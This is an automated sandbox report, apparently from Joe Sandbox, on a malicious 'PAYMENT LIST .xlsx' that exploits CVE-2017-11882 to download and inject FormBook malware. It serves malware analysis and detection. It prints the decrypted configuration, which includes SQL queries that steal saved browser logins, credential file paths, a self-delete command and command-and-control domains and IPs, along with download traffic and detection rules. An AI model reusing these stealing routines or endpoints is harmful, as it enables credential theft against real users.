Loading ...

Play interactive tourEdit tour

Analysis Report PAYMENT LIST .xlsx

Overview

General Information

Sample Name:PAYMENT LIST .xlsx
Analysis ID:344799
MD5:d707fd5eefcf9c3007a43585b86b021b
SHA1:6d9f2993d77d9e3dfc00055394581843b3f723b8
SHA256:ad2ea245de878f559d9da7881785790d151c55e66315f94c6d0b3e2729574f9e
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2432 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 824 cmdline: 'C:\Users\Public\vbc.exe' MD5: 3ED71F97489274760B6CF02192304259)
      • vbc.exe (PID: 2856 cmdline: C:\Users\Public\vbc.exe MD5: 3ED71F97489274760B6CF02192304259)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • msiexec.exe (PID: 1204 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
          • cmd.exe (PID: 2364 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bb79", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bbcd", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x17be8675", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad01221c", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01441", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "keboate.club", "whitehatiq.com", "loimtech.com", "icaroagencia.com", "snigglez.com", "noreservationsxpress.com", "villacascabel.com", "5037adairway.com", "growingequity.fund", "stafffully.com", "bingent.info", "tmssaleguarantee.com", "neonatalfeedrates.com", "george-beauty.com", "oraghallaighjourney.net", "zunutrition.com", "sylkysmooveentertainment.com", "ddmns6tzey2d.com", "dvcstay.com", "304shaughnessygreen.info", "ourbestbutes.com", "taob345.com", "fadhilaaqiqah.com", "freshmarketfood.com", "digitalcreativeclass.com", "bitcoin-devnotes.com", "rentapalla.com", "ethiopianjulary.com", "skillsknit.com", "circleoflifeco-op.com", "esteemquantum.life", "indiashiksha.com", "yqhbcapzy.icu", "goldcrownusa.com", "cinefil-i.com", "pickmeagift.com", "biomig.net", "actusdumoment.com", "theglobalfeedback.com", "skindetailing.com", "simplifiedvirtualsolutions.com", "ggss081746bcd.xyz", "spreadaccounts.com", "kapiscart.com", "fuyigranuletion.com", "doxinlabs.com", "piemontelaw.net", "kstamerica.com", "tueddur.com", "opmania36.com", "cartooninhindi4all.com", "chefericcatering.com", "tenshounoyu.com", "over64.com", "kerifletcherrock.com", "ruidongcctv.com", "ceejing.com", "dailyxe.online", "ubiquitus1.com", "binggraesantorini.com", "eggsmission.com", "revolutionarydisciples.com", "eatrestmoverepeat.co.uk", "kyleknievil.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.classifoods.com/oean/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 824
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.99.1.149, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2432, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 824
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 824
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 824

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bb79", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bbcd", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x17be8675", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad01221c", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01441", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for submitted fileShow sources
          Source: PAYMENT LIST .xlsxReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.2222782465.0000000000250000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi
          Source: global trafficDNS query: name: kungsb2sndygotchtsnp.dns.army
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.99.1.149:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.99.1.149:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 103.24.200.168:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 103.24.200.168:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 103.24.200.168:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 06:20:11 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Tue, 26 Jan 2021 23:17:27 GMTETag: "b8000-5b9d5dba8b629"Accept-Ranges: bytesContent-Length: 753664Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 74 0b 00 00 0a 00 00 00 00 00 00 4a 93 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 92 0b 00 4f 00 00 00 00 a0 0b 00 74 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 73 0b 00 00 20 00 00 00 74 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 74 06 00 00 00 